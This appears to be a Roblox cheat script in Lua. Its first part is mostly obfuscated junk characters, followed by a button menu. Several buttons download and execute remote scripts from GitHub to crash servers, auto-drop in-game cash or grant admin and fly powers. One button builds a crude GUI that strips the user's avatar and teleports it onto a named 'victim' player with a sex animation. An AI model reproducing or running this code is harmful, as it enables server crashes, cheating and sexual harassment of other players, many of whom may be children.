████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))break end;local o=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))break end;local p=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))end)break end;return true or false
end)
b:Button("Crash server",function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()
end)
b:Button("auto Cash drop",function()
    loadstring(game:HttpGet(("https://raw.githubusercontent.com/Raycodex/Exploiting/main/Roblox/Da%20Hood%20Auto%20Cash%20Drop"), true))()
end)
b:Button("Free admin",function()
    loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
end)
b:Button("Fly admin",function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/22kristina/swag/main/admin_fly"))()
end)
b:Button("F#ucking players",function()
--Nobody cares about credits. Just go ahead and fuck all of the Robloxians into OBLIVION!!!!!!
 
 
 
--Variables
 
 
local SimpleSexGUI = Instance.new("ScreenGui")
 
local FGUI = Instance.new("Frame")
 
local btnNaked = Instance.new("TextButton")
 
local btnSex = Instance.new("TextButton")
 
local tbxVictim = Instance.new("TextBox")
 
local lblFUCKEMALL = Instance.new("TextLabel")
 
local ImageLabel = Instance.new("ImageLabel")
 
local lbltitle = Instance.new("TextLabel")
 
local TextLabel = Instance.new("TextLabel")
 
 
 
 
 
 
 
 
--Properties
 
SimpleSexGUI.Name = "SimpleSexGUI"
SimpleSexGUI.Parent = game.CoreGui
 
 
FGUI.Name = "FGUI"
FGUI.Parent = SimpleSexGUI
FGUI.BackgroundColor3 = Color3.new(255,255,255)
FGUI.BorderSizePixel = 1
FGUI.Position = UDim2.new(0,0, 0.667, 0)
FGUI.Size = UDim2.new(0,317, 0,271)
FGUI.Draggable = true
 
 
 
lbltitle.Name = "Title"
lbltitle.Parent = FGUI
lbltitle.BackgroundColor3 = Color3.new(255,255,255)
lbltitle.BorderSizePixel = 1
lbltitle.Position = UDim2.new (0, 0,-0.122, 0)
lbltitle.Size = UDim2.new (0, 317,0, 33)
lbltitle.Visible = true
lbltitle.Active = true
lbltitle.Draggable = false
lbltitle.Selectable = true
lbltitle.Font = Enum.Font.SourceSansBold
lbltitle.Text = "A Simple Fuck(ing) GUI!!"
lbltitle.TextColor3 = Color3.new(0, 0, 0)
lbltitle.TextSize = 20
 
 
 
 
 
btnSex.Name = "Sex"
btnSex.Parent = FGUI
btnSex.BackgroundColor3 = Color3.new(255,255,255)
btnSex.BorderSizePixel = 1
btnSex.Position = UDim2.new (0.044, 0,0.229, 0)
btnSex.Size = UDim2.new (0, 99,0, 31)
btnSex.Visible = true
btnSex.Active = true
btnSex.Draggable = false
btnSex.Selectable = true
btnSex.Font = Enum.Font.SourceSansBold
btnSex.Text = "Let's FUCK!!"
btnSex.TextColor3 = Color3.new(0, 0, 0)
btnSex.TextSize = 20
 
 
 
 
tbxVictim.Name = "VictimTEXT"
tbxVictim.Parent = FGUI
tbxVictim.BackgroundColor3 = Color3.new(255,255,255)
tbxVictim.BorderSizePixel = 1
tbxVictim.Position = UDim2.new (0.533, 0,0.229, 0)
tbxVictim.Size = UDim2.new (0, 133,0, 27)
tbxVictim.Visible = true
tbxVictim.Active = true
tbxVictim.Draggable = false
tbxVictim.Selectable = true
tbxVictim.Font = Enum.Font.SourceSansBold
tbxVictim.Text = "[NAME]"
tbxVictim.TextColor3 = Color3.new(0, 0, 0)
tbxVictim.TextSize = 20
 
lblFUCKEMALL.Name = "FUCKEMALL"
lblFUCKEMALL.Parent = FGUI
lblFUCKEMALL.BackgroundColor3 = Color3.new(255,255,255)
lblFUCKEMALL.BorderSizePixel = 1
lblFUCKEMALL.Position = UDim2.new (0.025, 0,0.856, 0)
lblFUCKEMALL.Size = UDim2.new (0, 301,0, 27)
lblFUCKEMALL.Visible = true
lblFUCKEMALL.Font = Enum.Font.SourceSansBold
lblFUCKEMALL.Text = "FUCK AND FUCK"
lblFUCKEMALL.TextColor3 = Color3.new(0, 0, 0)
lblFUCKEMALL.TextSize = 20
 
ImageLabel.Name = "ImageLabel"
ImageLabel.Parent = FGUI
ImageLabel.Image = "http://www.roblox.com/asset/?id=4283774086"
ImageLabel.BorderSizePixel = 1
ImageLabel.Position = UDim2.new (0.274, 0,0.358, 0)
ImageLabel.Size = UDim2.new (0, 106,0, 121)
 
 
 
 
--Scripts
 
 
btnSex.MouseButton1Click:Connect(function()
 
local player = tbxVictim.Text
local stupid = Instance.new('Animation')
stupid.AnimationId = 'rbxassetid://148840371'
hummy = game:GetService("Players").LocalPlayer.Character.Humanoid
pcall(function()
    hummy.Parent.Pants:Destroy()
end)
pcall(function()
    hummy.Parent.Shirt:Destroy()
end)
local notfunny = hummy:LoadAnimation(stupid)
notfunny:Play()
notfunny:AdjustSpeed(10)
while hummy.Parent.Parent ~= nil do
wait()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[tbxVictim.Text].Character.HumanoidRootPart.CFrame
end
end)
end)
b:Button("Deluxe discord",function()
    game:GetService("StarterGui"):SetCore("SendNotification", {
        Title = "Discord";
        Text = "[⭐]X3X4D#2333";
        Duration = 500;
        Button1 = "Ok";
        Button2 = "Dispensar";
    })
end)
b:Button("Meu discord",function()
    game:GetService("StarterGui"):SetCore("SendNotification", {
        Title = "Discord";
        Text = "[💎] [👑] GadinhoDeRafa#1108";
        Duration = 500;
        Button1 = "Ok";
        Button2 = "Dispensar";
    })
end)


game:GetService("StarterGui"):SetCore("SendNotification", {
        Title = "Sucess ui";
        Text = "Loaded!";
        Duration = 3;
    })
